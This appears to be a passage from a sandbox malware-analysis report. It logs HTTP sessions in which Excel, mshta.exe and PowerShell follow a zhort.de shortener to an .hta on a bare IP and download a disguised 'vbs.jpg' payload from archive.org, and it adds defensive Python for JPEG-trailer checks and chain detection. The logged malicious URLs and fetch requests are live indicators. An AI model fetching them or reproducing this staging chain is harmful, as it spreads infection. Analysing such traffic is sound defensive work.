                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                      Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                      Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                      Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z
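Session 2 is powershell.exe fetching a 1,931,225-byte file served as image/jpeg from an archive.org item named "vbs_20240726"; the first captured bytes are a genuine JFIF header. Before trusting the Content-Type, a practitioner would check whether the bytes actually parse as a JPEG and whether anything trails the End-Of-Image marker, since stagers that hide a payload in an image commonly append it after the image ends. The following is an added example written for this page (not Joe Sandbox code and not the sample's own logic); it walks the JPEG marker segments and reports the trailer. CONSTRUCTED_JPEG and CONSTRUCTED_TRAILER are built here for the demonstration: the constructed header matches the first 20 captured bytes of vbs.jpg, but nothing about the real file's trailer is claimed.

```python
"""Sanity-check a blob that a script host fetched as 'image/jpeg'.

Added example for this report (not Joe Sandbox code).  Walks JPEG marker
segments, locates the End-Of-Image marker and reports whatever follows it.
CONSTRUCTED_JPEG is built here for the demonstration; it is not the captured
vbs.jpg, and no claim is made about that file's trailer."""
import re
from typing import Optional

SOI, EOI = b"\xff\xd8", b"\xff\xd9"


def jpeg_end_offset(data: bytes) -> Optional[int]:
    """Return the offset just past EOI, or None if this is not a parseable JPEG."""
    if not data.startswith(SOI):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None                      # lost sync: not at a marker boundary
        marker = data[pos + 1]
        if marker == 0xD9:                   # EOI
            return pos + 2
        if marker == 0xFF:                   # fill byte before a marker
            pos += 1
            continue
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                         # standalone markers carry no length
            continue
        if pos + 4 > len(data):
            return None
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2:
            return None
        pos += 2 + seg_len
        if marker == 0xDA:                   # SOS: skip entropy-coded scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                    # a real marker, not stuffed FF00 / RSTn
                pos += 1
    return None


def analyse_jpeg_blob(data: bytes) -> dict:
    """Summarise image vs. trailer so a 'jpg' can be judged before it is trusted."""
    end = jpeg_end_offset(data)
    trailer = data[end:] if end is not None else b""
    return {
        "is_jpeg": end is not None,
        "image_bytes": end or 0,
        "trailing_bytes": len(trailer),
        "trailer_is_base64": bool(trailer)
        and re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", trailer) is not None,
    }


# Constructed sample: JFIF APP0 header (same 20 bytes as the capture above),
# a one-component SOS with a stuffed 0xFF00 inside the scan, then EOI.
CONSTRUCTED_JPEG = (
    SOI
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56"
    + EOI
)
# Constructed trailer: base64 text appended after the image ends.
CONSTRUCTED_TRAILER = b"VGhpcyBpcyBub3QgYW4gaW1hZ2U=\r\n"

if __name__ == "__main__":
    print(analyse_jpeg_blob(CONSTRUCTED_JPEG))
    print(analyse_jpeg_blob(CONSTRUCTED_JPEG + CONSTRUCTED_TRAILER))
```

Run it against the downloaded vbs.jpg instead of the constructed bytes: a clean image gives trailing_bytes of 0, while a large base64 trailer is the thing to extract and decode next. The parser deliberately stops at the first EOI rather than searching for the last 0xFFD9, because that is where a naive viewer stops and where hidden data begins.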


                                                      Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
                                                      3          | 192.168.2.22 | 49171       | 88.99.66.38    | 443              | 3528 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-08-28 04:56:47 UTC | 321               | OUT       | GET /pitash HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:47 UTC | 469               | IN        | HTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:47 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:47 UTC | 80                | IN        | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
                                                      4          | 192.168.2.22 | 49174       | 88.99.66.38    | 443              | 1960 | C:\Windows\System32\mshta.exe
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-08-28 04:56:49 UTC | 345               | OUT       | GET /pitash HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:50 UTC | 469               | IN        | HTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:50 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:50 UTC | 80                | IN        | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
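Sessions 0 through 4 record the delivery chain end to end: EXCEL.EXE (PID 3528) calls the zhort.de shortener, is redirected by a 302 to an .hta hosted on a bare IP, mshta.exe follows the same link two seconds later, and powershell.exe then pulls the 1.9 MB "image" from archive.org; the chain then repeats with a second mshta.exe (PID 1960). The following is an added example for this page (not Joe Sandbox code) that turns those observations into detection logic over per-session HTTP records. SESSIONS is constructed from the session tables on this page; the 60-second chain window and the 1 MiB image threshold are assumptions chosen for the demonstration, not sandbox settings.

```python
"""Flag the Office -> mshta -> PowerShell delivery chain seen in the HTTP sessions.

Added example for this report (not Joe Sandbox code).  SESSIONS is constructed
from sessions 0-4 on the page; CHAIN_WINDOW_S and BIG_IMAGE_BYTES are assumed
thresholds, not values taken from the sandbox."""
import re
from datetime import datetime
from typing import Dict, List, Tuple

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "regsvr32.exe", "rundll32.exe"}
SCRIPT_EXT = (".hta", ".vbs", ".js", ".ps1", ".wsf")
BARE_IP_URL = re.compile(r"^https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.I)
CHAIN_WINDOW_S = 60          # assumption: Office -> script host within a minute
BIG_IMAGE_BYTES = 1 << 20    # assumption: a script host fetching >1 MiB image is odd

HTA_URL = "http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SESSIONS: List[Dict] = [  # constructed from the session tables above
    dict(id=0, ts="2024-08-28 04:56:27", pid=3528, process=EXCEL, host="zhort.de",
         path="/pitash", status=302, location=HTA_URL, ctype="text/plain", clen=80),
    dict(id=1, ts="2024-08-28 04:56:29", pid=3776, process=MSHTA, host="zhort.de",
         path="/pitash", status=302, location=HTA_URL, ctype="text/plain", clen=80),
    dict(id=2, ts="2024-08-28 04:56:42", pid=2848, process=PWSH,
         host="ia803104.us.archive.org",
         path="/27/items/vbs_20240726_20240726/vbs.jpg", status=200, location=None,
         ctype="image/jpeg", clen=1931225),
    dict(id=3, ts="2024-08-28 04:56:47", pid=3528, process=EXCEL, host="zhort.de",
         path="/pitash", status=302, location=HTA_URL, ctype="text/plain", clen=80),
    dict(id=4, ts="2024-08-28 04:56:49", pid=1960, process=MSHTA, host="zhort.de",
         path="/pitash", status=302, location=HTA_URL, ctype="text/plain", clen=80),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(sessions: List[Dict]) -> List[Tuple[int, str]]:
    """Return (session id, rule name) pairs; one session can trip several rules."""
    findings: List[Tuple[int, str]] = []
    office_seen: List[datetime] = []
    for s in sorted(sessions, key=lambda x: x["ts"]):
        proc = basename(s["process"])
        when = datetime.strptime(s["ts"], "%Y-%m-%d %H:%M:%S")
        if proc in OFFICE:
            findings.append((s["id"], "office_process_http_request"))
            office_seen.append(when)
        if proc in SCRIPT_HOSTS:
            findings.append((s["id"], "script_host_http_request"))
            # correlate with any Office request in the preceding window
            if any(0 <= (when - t).total_seconds() <= CHAIN_WINDOW_S for t in office_seen):
                findings.append((s["id"], "office_to_script_host_chain"))
            if s["ctype"].startswith("image/") and s["clen"] >= BIG_IMAGE_BYTES:
                findings.append((s["id"], "script_host_downloads_large_image"))
        loc = s.get("location") or ""
        if 300 <= s["status"] < 400 and BARE_IP_URL.match(loc) \
                and loc.lower().endswith(SCRIPT_EXT):
            findings.append((s["id"], "redirect_to_script_on_bare_ip"))
    return findings


if __name__ == "__main__":
    for sid, rule in evaluate(SESSIONS):
        print(f"session {sid}: {rule}")
```

The redirect rule fires on the 302 itself, so it catches the shortener hop even when the .hta fetch from 192.3.193.155 is not in the capture (the sandbox shows only the 443 sessions here). Keying the chain rule on timestamps rather than parent PID is deliberate: proxy logs rarely carry process lineage, but they do carry time and user agent.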


                                                      Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
                                                      5          | 192.168.2.22 | 49176       | 207.241.232.154 | 443              | 4016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-08-28 04:57:01 UTC | 111               | OUT       | GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                      Host: ia803104.us.archive.org
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:57:01 UTC | 591               | IN        | HTTP/1.1 200 OK
                                                      Server: nginx/1.24.0 (Ubuntu)
                                                      Date: Wed, 28 Aug 2024 04:57:01 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1931225
                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                      Connection: close
                                                      ETag: "66a41ab4-1d77d9"
                                                      Strict-Transport-Security: max-age=15724800
                                                      Expires: Wed, 28 Aug 2024 10:57:01 GMT
                                                      Cache-Control: max-age=21600
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                      Access-Control-Allow-Credentials: true
                                                      Accept-Ranges: bytes
                                                      2024-08-28 04:57:01 UTC | 15793             | IN        | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                      2024-08-28 04:57:01 UTC | 16384             | IN        | Data Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                      Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                      2024-08-28 04:57:01 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                      Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                      Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                      Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                      Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                      Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                      Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
